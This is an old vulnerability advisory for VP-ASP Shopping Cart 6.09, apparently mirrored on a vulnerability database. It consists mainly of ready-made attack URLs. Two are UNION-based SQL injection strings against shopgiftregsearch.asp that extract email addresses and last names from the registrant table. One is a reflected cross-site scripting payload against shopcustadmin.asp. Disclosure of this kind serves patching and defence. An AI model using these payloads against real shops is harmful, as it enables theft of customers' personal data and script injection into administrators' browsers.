Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15711
HistoryJan 12, 2007 - 12:00 a.m.

Title : VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities

2007-01-1200:00:00
vulners.com
126

Title : VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities

Author : ajann

Contact : :(

S.Page : http://www.vpasp.com

$$ : $49.00 - $350.00 - $495.00


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]

Example:

//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1

This Informations go to login page.

[[/SQL]]

[[XSS]]]---------------------------------------------------------

http://[target]/[path]//shopcustadmin.asp?msg=[XSS]

Example:

//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E

[[/XSS]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!